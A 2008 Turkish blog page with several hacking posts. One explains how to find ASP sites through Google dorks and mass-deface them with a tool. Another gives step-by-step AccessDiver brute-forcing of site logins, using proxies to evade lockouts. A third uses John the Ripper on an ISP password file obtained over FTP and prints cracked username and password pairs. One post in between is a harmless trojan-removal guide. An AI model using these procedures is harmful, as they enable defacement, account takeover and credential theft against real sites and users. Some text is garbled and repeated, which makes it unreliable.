Mynet | Blog Anasayfa | Email
Favorilerime Ekle | Giriş

ASP destekli siteleri çökertme!!!

26 Şubat 2008 Salı | 1 Yorum »

Oncelile programı indirelim
http://www.e-bilisim.org/issdata.zip
http://www.e-bilisim.org/sitebulma.rar
Simdi "Finde Site" adlı programı calistirin ve "Key wor" yazan yerin altına
Ornek :
hk filetype:asp

yazın burda hk ulkelerin alan adı kısaltlamarı (Kuzey Kore) buraya baska uzantılar da yaza blirsiniz tr (turkiye) gibi domain uzantılarını
mcuma.sitemynet.com/ulke.htm
burdan bula bilirsiniz burda ki her uzantıyı arama yaparken kulana bliirisniz. "filetype:asp"de asp destekli serverlar yada asp dosyaları bulunan siteleri armamızı saglar. (ikiside aynı seyler zaten :-P yada benzeR ne farkeder :-) )
(burda ki amac asp destekli siteleri bulmak, google daki arama tekniklerini iyi bi sekilde biliyosanız daha cok site bulabilirsiniz)
hk filetype:asp yazdıktan sonra "Capture Links" diyoz we siteleri bulmaya baslıyo arama bitikten sonra tumunu seciyoz ve bi Metin belgesine kaydediyoz (*txt)
Sonra "DavS" adlı programı acıyoz "Criar" yazan yerin altında ekliycemiz dosyanın adnını yazıyoz ben "/madboyiso.htm" yazdım sonra "Setar texto…." yazan yerin altınada bisiler salıyoz ben :-) " Hacked ßy gecekusu_always |-)" (isterseniz html kodları yada asp kodları da kulana bilirsiniz yanlız asp kod kulanıcanız zaman /demonsgod.htm yerine /demonsgod.asp yazmalısınız) yazdım sonra "listar" diyoz ve kaydetigimiz metin belgesini acıyoz ( hani su arama yaptıgımız siteleri metin belgesine atmsıtık ya onu :-P )
"Start Scan…"
dedikmi hack etmeye baslıyoz… "Pages Own.." yazan yerin altına dusen siteleri hack etmis oluyoz..

Adult Site Şifre Lerini Kırma

26 Şubat 2008 Salı | 2 Yorum »

http://accessdiver.com/download/ad4.84.exe bu adresten programın setup’ını bulabilirsiniz.

Bize wordlist ve proxylist lazım. Wordlistleri sitelerden rahatlıkla bulabilirsiniz ama ben kendim yapacağım diyorsanız raptor 3.0′ı öneririm bu programın setupını http://www.btinternet.com/~c.elsen/files/raptor.zip bu adresten bulabilirsiniz. AccessDiver’ın kendi içindede var böyle bir program ama raptor daha iyi. Proxylist için ise proxy hunterı öneririm ama zaten proxy hunter programı kendi içinde var AccessDiver’ın. Bence işin daha kolayı proxy yayınlayan sitelerden proxy almak. Proxy ne işimize yarayacak. Bu programda proxy güvenlikten çok daha fazla şifre denememizi sağlayacak. Mesela bazı siteler 1 ip ile ancak 3 login denemenize izin verir bunun içinde fazlasıyla kaliteli proxylere ihtiyacınız var. Kaliteli diyorum eğer proxy dandik olursa karşı sistem bunu anlar ve fake replay verir. İyi bir wordlist ve proxylist edindikten sonra programı anlatmaya başlayabiliriz.

İlk olarak programı açalım. Sonra en yukarda My skill ‘ı açın orda Expert - I’m an expert user - show me even more features (kısayolu F4).Sonra ortada Dictionary sonra onun altında Currently used bölümünü seçin. Orda eğer wordlistiniz bir combo ise Load a combo file a tıklayıp wordlistinizi açın. Eğer user için bir liste passler için ayrı bir listeniz varsa. User name list bölümünde dizin şeklindeki butona tıklayın oradan user için olan wordlisti açın. Sonra Password liste bölümünde dizin şeklinde butona tıklayın pass için olan wordlisti açın. Bu işi bitirdikten sonra ortada Settings bölümü altında da Acces bölümünü seçin. Orda sağda Never Stop - Continue until the end bölümünün yanına tik koyun(varsa ellemeyin) ve orda başka yerlerde tik varsa kaldırın sadece Never Stop - Continue until the endin yanında tik kalsın. Sonra Proxy bölümü altında da My LIST bölümünü seçin orda Use WEB proxiesin yanına tik koyun. Sonra aşağıda Proxy Skipping 4 tane bölüm var en üstekine tik koymayın alta ki üçünde tik olsun. Bu işi de bitirdikten sonra Proxy bölümü altında da Proxy Analyzer bölümünü seçin. Orda En soldaki resimli butona tıklayın orda proxylistinizi açın. Sonra aşağıdaki ctrl + a ile tüm proxyleri seçin. Sonra yukarda Speed/Accuracy Tester a tıklayın ve bekleyin bu arada yukarda bir yüzde dolmaya başlayacak en yukarda. O bittimi test etmesi de bitmiş demektir. Bu iş bittikten sonra aynı bölümde ortalarda en sağda Delay var ona tıklayın tıkladıktan sonra delayda rakam bulunmayan tüm proxyleri silin(shifte basılı tutup silin kasmayın :P). Bu iş bittikten sonra ctrl + a ile geriye kalan tüm proxyleri seçin. Sonra orda disket şeklindeki butona tıklayın ve Save proxies to a file (save IP adresses) a tıklayın ve kaydedin. Ardından Proxy bölümü altında da My LIST bölümünü seçin. Orda sağda dizin şeklindeki butona tıklayın sonra daha demin kaydettiğiniz proxylisti açın. Sonra ordan bir ipnin üstüne tıklayın. Bundan sonra yukarıda Server hedef sitenin adresini yazın fakat adres sitenin login kısmının adresi olsun yani açılan ayrı pencerenin adresi. Bunu da yaptıktan sonra Yukarda solda yıldırım şeklindeki buton’a(Standart) tıklayın. Ve bekleyin bağlantı hızınız, hazırladığınız wordlist ve proxylist gerisini halleder. Loginleri bulduğunda program orda gösterir. Bu arada bunu her siteyi kırmayı denediğinizde yapın.à Proxy bölümü altında da Proxy Analyzer bölümünü seçin. Orda En soldaki resimli butona tıklayın orda proxylistinizi açın. Sonra aşağıdaki ctrl + a ile tüm proxyleri seçin. Sonra yukarda Speed/Accuracy Tester a tıklayın ve bekleyin bu arada yukarda bir yüzde dolmaya başlayacak en yukarda. O bittimi test etmesi de bitmiş demektir. Bu iş bittikten sonra aynı bölümde ortalarda en sağda Delay var ona tıklayın tıkladıktan sonra delayda rakam bulunmayan tüm proxyleri silin(shifte basılı tutup silin kasmayın :P). Bu iş bittikten sonra ctrl + a ile geriye kalan tüm proxyleri seçin. Sonra orda disket şeklindeki butona tıklayın ve Save proxies to a file (save IP adresses) a tıklayın ve kaydedin. Ardından Proxy bölümü altında da My LIST bölümünü seçin. Orda sağda dizin şeklindeki butona tıklayın sonra daha demin kaydettiğiniz proxylisti açın. Sonra oradan bir ipnin üstüne tıklayın. Çünkü proxyler zamanla inaktif olurlar. Orda botlar var dial iseniz max 25 bot yapın eğer bağlantınız normal bir kablo ise 64 vseya128 k max 100 bot eğer bağlantınız 256 k veya 512 k ise veya bundan daha iyi ise max 150 bot yapın.

Adım Adım Trojan Silimi

26 Şubat 2008 Salı | Yorum yok »

Adım Adım Trojan Silimi

ıÜüTemizlik sırasında yapmanız gereken bir takım işlemler vardır. Daha az deneyimli kullanıcılar için, bu işlemlerin neler olduğunu ve nasıl yapılacağını bir kez gözden geçirelim.

l PC’yi MS-DOS Kipinde Başlatma: Bunun için görev çubuğunuzdan Başlat*Bilgisayarı Kapat komutuna tıklayın; ve karşınıza çıkacak menüde "MS-DOS Kipinde Başlat" seçeneğini işaretleyerek Tamam tuşuna basın.

l MS-DOS Komut İstemi Penceresi Açma: Yine görev çubuğunuzdan Başlat*Çalıştır komutuna tıklayın; ve açılan pencereye COMMAND yazın.

l DOS Ortamında Dosya Silme: Komut satırındayken,

DEL "SilinecekDosyanınAdı"

komutunu kullanmalısınız. Örnek olarak, Acid Shivers trojan dosyasını silerken

DEL "C:Windowsmsgsvr16.exe"

komutunu kullanıyoruz. Tırnak işaretlerini koymayı unutmayın; bu şekilde DOS’un desteklemediği uzun dosya isimleriyle karşı karşıya kaldığınızda başınız derde girmez.

l Windows Ortamında Dosya Silme: Bunu yapmak, DOS ortamında komut yazmaktan daha kolaydır. Windows Gezgini’nde silmek istediğimiz dosyayı işaretleyerek sağ fare tuşuna tıklayın ve SİL komutunu seçin. PC’miz bize gerçekten silmek isteyip istemediğimizi sorduğunda ise olumlu cevap verin.

l Registry Değeri Silme: Öncelikle Başlat*Çalıştır komutunu çalıştırarak REGEDIT yazın. Karşınıza çıkacak pencerenin sol tarafında silinecek değerin adresini bulun ve sağ tarafta söz konusu değeri işaretleyip klavyedeki DELETE tuşuna basın. Mesela BackDoor trojanı için HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentV ersionRun adresini açıp, sağ tarafta belirecek olan "icqnuke.exe" değerinden kurtulmanız gerekiyor.

DİKKAT EDİLMESİ

GEREKEN NOKTALAR

l Trojan temizliğine başlamadan önce, PC’nizdeki gizli ve sistem dosyalarınızın tümünü görünür hale getirin. Bunun için Windows Gezgini’nde Görünüm*Klasör Seçenekleri (View*Folder Options) menüsüne tıklayın; açılan pencerenin Görünüm (View) sekmesinde "Tüm Dosyaları Göster" (Show All Files) kutucuğunun işaretli olduğuna emin olun. Ayrıca altındaki "Bilinen Dosya Türlerinin Uzantılarını Gizle" kutucuğunun işaretini kaldırmanız da yararınıza olacaktır.

l Bazı trojan’ların açıklamalarında aynı ada ve farklı dizine sahip birden fazla dosyanın silinmesi gerektiği yazmaktadır. Eğer söz konusu dosya dizinlerden sadece birinde varsa, onu silmeniz de yeterli olacaktır.

l Unutmayın ki, trojanların isimlerini ve diğer bilgilerini değiştirmek pek zor değildir. Burada verdiklerimiz, taşıdıkları orijinal özelliklerdir. Adı değiştirilmiş bir trojan dosyasının yerini belirlemek biraz daha problemlidir; bu sorunun çözümüne örnek olarak NetBus ve SubSeven trojanını inceleyebilirsiniz.

l Dosya veya Registry değeri silme işlemleri sırasında çok dikkatli olun. Özellikle Registry, Windows için hayati önem taşır. Yanlış bir şey silmeniz sisteminizde aksaklıklara yol açabilir.

TEMİZLİK ZAMANI!

ACID SHIVERS

Port Numarası: 10520

Dosya Adı: "msgsvr16.exe"

Boyutu: 186 Kb

Dizini: C:Windows

1. Registy’nizdeki HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentV ersionRun "Explorer | msgsvr16.

exe" kaydını silin.

2. Registry’nizdeki HKEY_LOCAL_

MACHINESoftwareMicrosoftWindowsCurrentVersionRunSe rvices "Explorer | msgsvr16.exe" kaydını silin.

3. PC’nizi MS-DOS kipinde başlatın.

4. "C:Windowsmsgsvr16.exe" dosyasını silin.

5. PC’nizi yeniden başlatın.

BACK ORIFICE

Port Numarası: 31337

Dosya Adı: ".exe"

Boyutu: 122 Kb

Dizini: C:WindowsSystem

1. Registry’nizdeki HKEY_LOCAL_

MACHINESoftwareMicrosoftWindowsCurrentVersionRunSe rvices ".exe" kaydını silin.

2. PC’nizi yeniden başlatın.

3. Windows Explorer’ı başlatın. Görünüm*Klasör Seçenekleri menüsündeki Görünüm sekmesini açın ve Gizli Dosyalar bölümünde "Tüm Dosyaları Göster" seçeneğinin işaretli olduğundan emin olun.

3. "C:WindowsSystem.exe" dosyasını silin.

4. PC’nizi yeniden başlatın.

BACKDOOR

Port Numarası: 1999

Dosya Adı: "icqnuke.exe"

Boyutu: 102 Kb

Dizini: C:Windows, C:WindowsSystem

1. Registry’nizdeki HKEY_LOCAL_

MACHINESoftwareMicrosoftWindowsCurrentVersionRun "icqnuke.exe" kaydını silin.

2. PC’nizi MS-DOS kipinde başlatın.

3. "C:Windowsicqnuke.exe" ve "C:WindowsSystemicqnuke.exe" dosyalarını silin.

4. PC’nizi yeniden başlatın.

BIG GLUCK

Port Numarası: 34324

Dosya Adı: "bg10.exe"

Boyutu: 100 Kb

Dizini: C:Windows, C:WindowsSystem

1. Registry’nizdeki HKEY_LOCAL_

MACHINESoftwareMicrosoftWindowsCurrentVersionRunSe rvices "bg10.exe" kaydını silin.

2. PC’nizi MS-DOS kipinde başlatın.

3. "C:Windowsbg10.exe" ve "C:

WindowsSystembg10.exe" dosyalarını silin.

4. PC’nizi yeniden başlatın.

BLADE RUNNER

Port Numarası: 21, 5400, 5401, 5402

Dosya Adı: "server.exe"

Boyutu: 323 Kb

Dizini: C:Windows, C:WindowsSystem

1. Registry’nizdeki HKEY_LOCAL_

MACHINESoftwareMicrosoftWindowsCurrentVersionRun "server.exe" kaydını silin.

2. PC’nizi MS-DOS kipinde başlatın.

3. "C:Windowsserver.exe" ve "C:

WindowsSystemserver.exe" dosyalarını silin.

4. PC’nizi yeniden başlatın.

BUGS

Port Numarası: 2115

Dosya Adı: "bugs.exe"

Boyutu: 78 Kb

Dizini: C:Windows, C:WindowsSystem

1. Registry’nizdeki HKEY_LOCAL_

MACHINESoftwareMicrosoftWindowsCurrentVersionRun "bugs.exe" kaydını silin.

2. PC’nizi MS-DOS kipinde başlatın.

3. "C:Windowsbugs.exe" ve "C:

WindowsSystembugs.exe" dosyalarını silin.

4. PC’nizi yeniden başlatın.

DEEP BACK ORIFICE

Port Numarası: 31338

Dosya Adı: ".exe"

Boyutu: 122 Kb

Dizini: C:Windows

1. Registry’nizdeki HKEY_LOCAL_

MACHINESoftwareMicrosoftWindowsCurrentVersionRunSe rvices ".exe" kaydını silin.

2. PC’nizi yeniden başlatın.

3. Windows Explorer’ı başlatın. Görünüm*Klasör Seçenekleri menüsündeki Görünüm sekmesini açın ve Gizli Dosyalar bölümünde "Tüm Dosyaları Göster" seçeneğinin işaretli olduğundan emin olun.

4. "C:WindowsSystem.exe" dosyasını silin.

5. PC’nizi yeniden başlatın.

DEEP THROAT

Port Numarası: 2140, 3150

Dosya Adı: "systempatch.exe"

Boyutu: 255 Kb

Dizini: ?

1. Registry’nizdeki HKEY_LOCAL_

MACHINESoftwareMicrosoftWindowsCurrentVersionRun anahtarını açın. "systemDLL32 | systempatch.exe" kaydının işaret ettiği dizini bir kenara not aldıktan sonra söz konusu kaydı silin.

2. PC’nizi MS-DOS kipinde başlatın.

3. Not etmiş olduğunuz dizin altındaki "systempatch.exe" dosyasını silin. MS-DOS kipinde adı 8 karakterden uzun dosyaların isimleri kısaltılacağı için, "system~1.exe" veya benzeri ada sahip bir dosyayı aramalısınız. Eğer "system~" şeklinde başlayan birden fazla EXE dosyası varsa hangisinin trojan dosyası olduğundan emin olmadan silme işine girişmeyin.

4. PC’nizi yeniden başlatın.

DOLY TROJAN

Port Numarası: 1011, 21

Dosya Adı: "tesk.exe"

Boyutu: 169 Kb

Dizini: C:Wİndows , C:WindowsSystem

1. Registry’nizdeki HKEY_LOCAL_

MACHINESoftwareMicrosoftWindowsCurrentVersionRun "tesk.exe" kaydını silin.

2. PC’nizi MS-DOS kipinde başlatın.

3. "C:Windowstesk.exe" ve "C:WindowsSystemtesk.exe" dosyalarını silin.

4. PC’nizi yeniden başlatın.

GIRLFRIEND

Port Numarası: 21554

Dosya Adı: "windll.exe"

Boyutu: ?

Dizini: C:Windows

1. Registry’nizdeki HKEY_LOCAL_

MACHINESoftwareMicrosoftWindowsCurrentVersionRun "windll.exe" kaydını silin.

2. PC’nizi yeniden başlatın.

3. "C:Windowswindll.exe" dosyasını silin.

4. PC’nizi yeniden başlatın.

HACK A TACK

Port Numarası: 31785, 31787

Dosya Adı: "expl32.exe"

Boyutu: 236 Kb

Dizini: C:Windows

1. Registry’nizdeki HKEY_LOCAL_

MACHINESoftwareMicrosoftWindowsCurrentVersionRun "Explorer32 | C:Windowsexpl32.exe" kaydını silin.

2. PC’nizi MS-DOS kipinde başlatın.

3. "C:Windowsexpl32.exe" dosyasını silin.

4. PC’nizi yeniden başlatın.

INIKILLER

Port Numarası: 9989

Dosya Adı: "bad.exe"

Boyutu: ?

Dizini: C:Windows

1. Registry’nizdeki HKEY_LOCAL_

MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun "Explorer" kaydını silin.

2. PC’nizi yeniden başlatın.

3. "C:Windowsbad.exe" dosyasını silin.

4. PC’nizi yeniden başlatın.

MASTERS PARADISE

Port Numarası: 3129, 40421, 40422,40423,

40426

Dosya Adı: "sysedit.exe", "keyhook.dll"

Boyutu: ?

Dizini: C:Windows

1. Registry’nizdeki HKEY_LOCAL_

MACHINESoftwareMicrosoftWindowsCurrentVersionRun "sysedit.exe" kaydını silin.

2. PC’nizi yeniden başlatın.

3. "C:Windowssysedit.exe" ve "C:

Windowskeyhook.dll" dosyalarını silin.

4. PC’nizi yeniden başlatın.

5. Gerçek "sysedit.exe" dosyasını Windows CD’nizden veya güvendiğiniz bir arkadaşınızdan tekrar yükleyin.

NETBUS PRO

Port Numarası: 20034

Dosya Adı: "NBSvr.exe"

Boyutu: 599 Kb

Dizini: C:Windows , C:WindowsSystem

1. Registry’nizdeki HKEY_LOCAL_

MACHINESoftwareMicrosoftWindowsCurrentVersionRunSe rvices "NetBus Server Pro | nbsvr.exe" kaydını silin.

2. Registry’nizdeki HKEY_CURRENT_

USERNetBus Server anahtarını silin.

3. PC’nizi MS-DOS kipinde başlatın.

4. "C:WindowsNBSvr.exe" , "C:WindowsNBHelp.dll" , "C:WindowsLog.txt" dosyalarını silin. (Aynı dosyalar C:WindowsSystem dizininde de olabilir)

5. PC’nizi yeniden başlatın.

NETBUS

Port Numarası: 12345, 12346

Dosya Adı: "patch.exe"

Boyutu: 470 Kb

Dizini: C:WindowsSystem

1. Registry’nizdeki HKEY_LOCAL_

MACHINESoftwareMicrosoftWindowsCurrentVersionRun "patch.exe" kaydını arayın. Söz konusu kaydı bulamazsanız trojan’ın adı değiştirilmiş demektir. Bu durumda aynı Registry anahtarı altında yer alan tüm EXE kayıtlarını not alın ve C:WindowsSystem dizinindeki EXE dosyalarıyla karşılaştırın. 470 KB boyutunda olan dosya, adı değiştirilmiş NetBus trojanıdır. Registry kaydını silin.

2. Bir MS-DOS Komut İstemi penceresi açın ve "C:WindowsSystempatch.

exe /remove" komutunu kullanın. (Trojanın adı değiştirilmişse, patch.exe yerine PC’nizdeki adını yazın.)

3. "C:WindowsSystempatch.exe" dosyasını silin.

NETSPHERE

Port Numarası: 30100, 30101, 30102

Dosya Adı: "nssx.exe"

Boyutu: 640 Kb

Dizini: C:WindowsSystem

1. Registry’nizdeki HKEY_LOCAL_

MACHINESoftwareMicrosoftWindowsCurrentVersionRun "NSSX | C:WindowsSystemnssx.exe" kaydını silin.

2. PC’nizi MS-DOS kipinde başlatın.

3. "C:Windowsnssx.exe" dosyasını silin.

4. PC’nizi yeniden başlatın.

RAT

Port Numarası: 1095, 1097, 1098, 1099

Dosya Adı: " .exe", "mswinsck.ocx",

"wavestream.dll", "regsvr32.exe"

Boyutu: 298 KB, 99 Kb, 35 Kb, 20 Kb

Dizini: C:WindowsSystem

1. Registry’nizdeki şu anahtarları silin:

HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{925B0F6C-605D-11CF-BAEF-F89005C10000}

HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{925B0F6C-605D-11CF-BAEF-F89005C10000} Implemented Categories

HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{925B0F6C-605D-11CF-BAEF-F89005C10000}

Implemented Categories{40FC6ED5-2438-11CF-A3DB-080036F12502}

HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{925B0F6C-605D-11CF-BAEF-F89005C10000}InprocServer32

HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{925B0F6C-605D-11CF-BAEF-F89005C10000}ProgID

HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{925B0F6C-605D-11CF-BAEF-F89005C10000}Programmable

HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{925B0F6C-605D-11CF-BAEF-F89005C10000}TypeLib

HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{925B0F6C-605D-11CF-BAEF-F89005C10000}Version

HKEY_LOCAL_MACHINESOFTWAREClassesInterface{925B0F6 B-605D-11CF-BAEF-F89005C10000}

HKEY_LOCAL_MACHINESOFTWAREClassesInterface{925B0F6 B-605D-11CF-BAEF-F89005C10000}ProxyStubClsid

HKEY_LOCAL_MACHINESOFTWAREClassesInterface{925B0F6 B-605D-11CF-BAEF-F89005C10000}ProxyStubClsid32

HKEY_LOCAL_MACHINESOFTWAREClassesInterface{925B0F6 B-605D-11CF-BAEF-F89005C10000}TypeLib

HKEY_LOCAL_MACHINESOFTWAREClassesTypeLib{925B0F6D-605D-11CF-BAEF-F89005C10000}

HKEY_LOCAL_MACHINESOFTWAREClassesTypeLib{925B0F6D-605D-11CF-BAEF-F89005C10000}1.0

HKEY_LOCAL_MACHINESOFTWAREClassesTypeLib{925B0F6D-605D-11CF-BAEF-F89005C10000}1.0

HKEY_LOCAL_MACHINESOFTWAREClassesTypeLib{925B0F6D-605D-11CF-BAEF-F89005C10000}1.0win32

HKEY_LOCAL_MACHINESOFTWAREClassesTypeLib{925B0F6D-605D-11CF-BAEF-F89005C10000}1.0FLAGS

HKEY_LOCAL_MACHINESOFTWAREClassesTypeLib{925B0F6D-605D-11CF-BAEF-F89005C10000}1.0HELPDIR

HKEY_LOCAL_MACHINESOFTWAREClassesWaveStreaming.Wav eStream

HKEY_LOCAL_MACHINESOFTWAREClassesWaveStreaming.Wav eStreamClsid

2) Registry’nizdeki şu kayıtları silin:

HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{925B0F6C-605D-11CF-BAEF-F89005C10000} @="WaveStreaming.WaveStream"

HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{925B0F6C-605D-11CF-BAEF-F89005C10000} InprocServer32@="C:WINDOWSSYSTEMWAVESTREAM.DLL"

HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{925B0F6C-605D-11CF-BAEF-F89005C10000} ProgID@="WaveStreaming.WaveStream"

HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{925B0F6C-605D-11CF-BAEF-F89005C10000} TypeLib@="{925B0F6D-605D-11CF-BAEF-F89005C10000}"

HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{925B0F6C-605D-11CF-BAEF-F89005C10000} Version@="1.0"

HKEY_LOCAL_MACHINESOFTWAREClassesInterface{925B0F6 B-605D-11CF-BAEF-F89005C10000} @="WaveStream"

HKEY_LOCAL_MACHINESOFTWAREClassesInterface{925B0F6 B-605D-11CF-BAEF-F89005C10000} ProxyStubClsid@="{00020424-0000-0000-C000-000000000046}"

HKEY_LOCAL_MACHINESOFTWAREClassesInterface{925B0F6 B-605D-11CF-BAEF-F89005C10000} ProxyStubClsid32@="{00020424-0000-0000-C000-000000000046}"

HKEY_LOCAL_MACHINESOFTWAREClassesInterface{925B0F6 B-605D-11CF-BAEF-F89005C10000} TypeLib@="{925B0F6D-605D-11CF-BAEF-F89005C10000}"

HKEY_LOCAL_MACHINESOFTWAREClassesInterface{925B0F6 B-605D-11CF-BAEF-F89005C10000} TypeLibVersion="1.0"

HKEY_LOCAL_MACHINESOFTWAREClassesTypeLib{925B0F6D-605D-11CF-BAEF-F89005C10000}1.0 @="MS Internet Audio Streaming Support"

HKEY_LOCAL_MACHINESOFTWAREClassesTypeLib{925B0F6D-605D-11CF-BAEF-F89005C10000}1.0win32 @="C:WINDOWSSYSTEMWAVESTREAM.DLL"

HKEY_LOCAL_MACHINESOFTWAREClassesTypeLib{925B0F6D-605D-11CF-BAEF-F89005C10000}1.0FLAGS @="0"

HKEY_LOCAL_MACHINESOFTWAREClassesTypeLib{925B0F6D-605D-11CF-BAEF-F89005C10000}1.0 HELPDIR@="C:WINDOWSSYSTEM"

HKEY_LOCAL_MACHINESOFTWAREClassesWa…eStreaming.W aveStream"

HKEY_LOCAL_MACHINESOFTWAREClassesWaveStreaming.Wav eStreamClsid @="{925B0F6C-605D-11CF-BAEF-F89005C10000}"

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentV ersionRun Explorer="C:WINDOWSsystem

MSGSVR16.EXE"

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentV ersionRunServicesDefault=" "

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentV ersionRunServicesExplorer=" "

3. PC’nizi MS-DOS kipinde başlatın.

4. "C:WindowsSystem .exe" , "C:WindowsSystemMSGSVR16.EXE" , "C:WindowsSystemwaveStream.dll" dosyalarını silin.

5. PC’nizi yeniden başlatın.

SUBSEVEN

Port Numarası: 1243, 1999, 6711, 6776

Dosya Adı:

1. Dosya: "server.exe", "rundll16.exe",

"systray.dl", "Task_bar.exe"

2. Dosya: "FAVPNMCFEE.dll",

""MVOKH_32.dll", "nodll.exe",

"watching.dll"

Boyutu: 328 Kb, 35 Kb

Dizini: C:Windows, C:WindowsSystem

1. "C:WindowsSystemSysEdit.exe" dosyasını çalıştırın. SYSTEM.INI dosyasının [boot] bölümündeki "shell=Explorer.exe" satırını inceleyin. Satırın sağına yukarıda adı geçen dosya adlarından biri eklenmişse, dosya adını bir kenara not edin ve satırı "shell=Explorer.exe" haline getirin.

2. Aynı penceredeki WIN.INI dosyasının [windows] bölümünde "run=" ve "load=" diye başlayan satırları inceleyin. Söz konusu satırlardan biri yukarıda adı geçen dosyalardan birine işaret ediyorsa, dosya adını not edin ve satırı silin.

3. Yapmış olduğunuz değişiklikleri kaydedip SysEdit penceresini kapatın.

4. Registry’nizdeki HKEY_LOCAL_

MACHINESoftwareMicrosoftWindowsCurrentVersionRun anahtarını inceleyin ve yukarıda adı geçen dosyalara işaret eden kayıtları silin. Herhangi bir kayıt bulamazsanız trojanın adı değiştirilmiş demektir. Bu durumda aynı Registry anahtarı altında yer alan tüm EXE kayıtlarını not alın ve C:Windows dizinindeki EXE dosyalarıyla karşılaştırın. 328 Kb boyutunda olan dosya, adı değiştirilmiş SubSeven trojanıdır. Registry kaydını silin.

5. PC’nizi yeniden başlatın.

6. C:Windows dizinindeki trojan dosyasını silin.

WHACK A MOLE

Port Numarası: 12361, 12362

Dosya Adı: "whack.exe"

Boyutu: ?

Dizini: C:Windows

1. Registry’nizdeki şu kayıtları silin:

HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentV ersionRun "NetBuster"

HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentV ersionRun "SysCopy"

HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentV ersionRunServices "RunDll"

HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentV ersionRunServices "RunDll32"

2. Registry’nizdeki HKEY_CLASSES_

ROOT.dl_ anahtarını silin.

3. PC’nizi MS-DOS kipinde başlatın.

4. C:Windows dizini altındaki Şu dosyaları silin:

keyhook.dll

keyhook.dl_

nbsetup.reg

nb2setup.reg

ntsetup.reg

nt2setup.reg

rundll.dl_

whack.exe

5. PC’nizi yeniden başlatın.

WINCRASH

Port Numarası: 5742

Dosya Adı: "server.exe"

Boyutu: 290 Kb

Dizini: C:WindowsSystem

1. Registry’nizdeki HKEY_LOCAL_

MACHINESoftwareMicrosoftWindowsCurrentVersionRun "MsManager | SERVER.EXE" kaydını silin.

2. PC’nizi MS-DOS kipinde başlatın.

3. "C:WindowsSystemserver.exe" dosyasını silin.

4. PC’nizi yeniden başlatın.

ACCOUNT HACK

26 Şubat 2008 Salı | 3 Yorum »

….Aşağıdaki işlemleri DOS da uygulayınız….


C:\Tool\hack\crackers\john>John bilmemnenetpass.txt -i:ALL -beep

John the Ripper Version 1.4 Copyright (c) 1996,97 by Solar Designer

Loaded 246 passwords with 198 different salts (DES)

baro (baroktp)
tuna (atanik)
sony (hasel)
1976 (guzine)
1963 (adeniz)
1970 (nsterzi)
1961 (simge)
1098 (mgokalp)
1997 (gelegen)
cana (tsengor)
murat (hmurat)
pati (sug)
trash (bulut)
m2112 (mugo)
candan (odonmez)

 

 

John bilmemnenetpass.txt -i:ALL -beep —-> Burada ALL:hem rakam , hem harf olduunu belirtmektedir.

ALL yerine ALPHA yazarsanIz sadece harf , DIGIT yazarsanIz sadece rakamlarI göz önünde

bulundurur.

Ancak öncelikle Türkiye deki iss lerin %90 I min:4 , max:8 karakter kullanmaktadIrlar. Bu sebeple

isiniz daa kolaylassIn die John.ini dosyasInIn icinden max ve min i ayarlamanIzI tavsiye ederim.

bilmemnenetpass.txt ise , mesela atonetten(prizma,raksnet…) þifre aldInIz ve nete baalandInIz.Ftpden

baalanIn (ftp.****.net) ve pass dosyasInI indirin iste burda yazan *.txt dosyasI ftpden indirilmis

dosyadIr.Bu anlattIIm yöntem wordlist gerektirmeyen kolay yöntemdir.Son olarakta dosta yazdIImIz

-beep her pass kIrIldIgInda size haber vermesi icin yararlIdIr…

 

Eger kýrma islemini wordlistle yapmak istiyorsanýz ki ben bunu tavsiye ederim,o zaman buradaki satIrI dosta yazmanIz gerekir;

john -wordfile:wordlist.txt -pwfile:herhanginetpass.txt >sonuclar.txt

wordlist.txt elinizde bulunan kelime arsivleridir.Iste size meliksah In yazdIgI bir program,adI sibop ve güzel bir wordlist hazIrlayan program,Download ediniz;

herhanginetpass.txt elinizde bulunan ftp ile alInmIs password dosyasIdIr,unshadowludur,denemelik bunu alIn;

sonuclar.txt ise ;

cana (tsengor)

murat (hmurat)

Bu sekilde kırIlacak passwordlerin bulunacagI dosyadIr.parantez icindeki password,digeri username dir.

 

Mynet Blog WordpressMU alt yapısını kullanmaktadır.